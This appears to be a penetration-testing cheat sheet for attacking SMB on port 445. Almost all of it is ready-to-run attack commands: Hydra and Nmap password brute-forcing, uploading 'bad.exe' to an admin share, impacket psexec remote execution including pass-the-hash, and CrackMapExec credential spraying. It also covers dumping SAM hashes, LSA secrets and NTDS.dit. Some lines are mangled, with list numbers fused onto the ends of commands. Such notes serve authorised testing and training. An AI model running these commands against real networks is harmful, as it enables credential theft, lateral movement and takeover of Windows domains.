SMB - 445
SMB Bruteforcing
Hydra Command: Execute SMB brute forcing using username and password lists.
Nmap Command: Nmap script for SMB brute force using username and password files.
hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt -vV 172.19.19.70 smb
nmap -p445 172.25.30.4 --script smb-brute.nse --script-args userdb=/home/kali/wordlistcpent/usernames,passdb=/home/kali/wordlistcpent/passwords --script-args ssh-brute.timeout=4s SMB Enumeration
nmap -p 445,138,139 --script=*smb*# Connect to a share via SMB
smbclient \\\\IP\\c$ -U Administrator
# Extract interesting domain and computer info with Enum4linux
Enum4linux -a -u 'Administrator' -p 'iloveu'
# Share file via smbclient
smbclient -c 'put bad.exe' -U t1_leonard.summers -W ZA '//thisis.za.tryhackme.com/admin$' EZpass4ever
# list shares
smbclient -L 10.129.170.128 -U Administrator
# NAVIGATE THROUGH UNPROTECTED C* SHARE
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator
# List shares without asking for a password -
smbclient -N -L 10.0.0.43
# Show all NetBIOS names and functions of the IP
Nbtstat -A IPImpackets
# Use impacket for remote code execution through SMB
Python /usr/share/doc/python3-impacket/examples/psexec.py active.htb/administrator:[email protected]
Python /usr/share/doc/python3-impacket/examples/psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
impacket-psexec ECC.LOCALNET/administrator:'Pa$$w0rd123'@172.25.170.80
# Using PsExec.exe from Windows to have code execution via SMB
PsExec.exe \\172.25.170.110: cmd.exeCrackMapExec
CrackMapExec (CME) can be used to enumerate SMB sessions, Active Directory group memberships, and SMB shares. Below are some typical usage examples:
1. Map network hosts
# Returns a list of live hosts in the network
cme smb 192.168.1.0/242. Generate Relay List
# Maps the network of live hosts and saves a list of hosts that don't require SMB signing
cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt3. Enumerate shares and access
# Enumerates shares on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares4. Enumerate active sessions
# Lists active sessions on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions5. Enumerate disks
# Lists disks on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks6. Enumerate logged on users
# Lists logged on users on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users7. Enumerate domain users
# Lists domain users on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users8. Enumerate users by bruteforcing RID
# Enumerates users by bruteforcing RID using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute9. Enumerate domain groups
# Lists domain groups on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups10. Enumerate local groups
# Lists local groups on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups11. Obtain domain password policy
# Retrieves the domain password policy using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol12. Authentication with User/Password
# Attempts authentication using username and password
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'13. Authentication with User/Hash
# Attempts authentication using username and NTLM hash
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'14. Null Sessions
# Attempts authentication with null sessions
cme smb 192.168.1.0/24 -u '' -p ''15. Using Username/Password Lists
# Uses lists of usernames and passwords for authentication attempts
cme smb 192.168.1.101 -u /path/to/users.txt -p /path/to/passwords.txt16. Authentication with Local Auth
# Attempts local authentication using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth17. Dump SAM hashes
# Dumps SAM hashes using methods from secretsdump.py
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam18. Dump LSA secrets
# Dumps LSA secrets using methods from secretsdump.py
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa19. Dump NTDS.dit
# Dumps the NTDS.dit from target DC using methods from secretsdump.py
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds20. Spidering Shares
# Spiders the C drive for files with 'txt' in the name
cme SMB <IP> -u USER -p PASSWORD --spider C\$ --pattern txt21. Command Execution
# Executes commands on remote systems using specified method
cme smb 10.10.33.121 -u Administrator -p AAdmin\!23 -X '$PSVersionTable' --exec-method wmiexec22. WMI Query Execution
# Issues the specified WMI query
cme smb 10.10.33.121 -u Administrator -p 'P@ssw0rd' --wmi "SELECT * FROM Win32_logicalDisk WHERE DeviceID = 'C:'"23. WMI Query Execution in a Specific Namespace
# Issues a WMI query in the specified namespace
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --wmi-namespace 'root\\cimv2'This command allows you to execute WMI queries within the root\\cimv2 namespace, which is commonly used for system management information. L
Last updated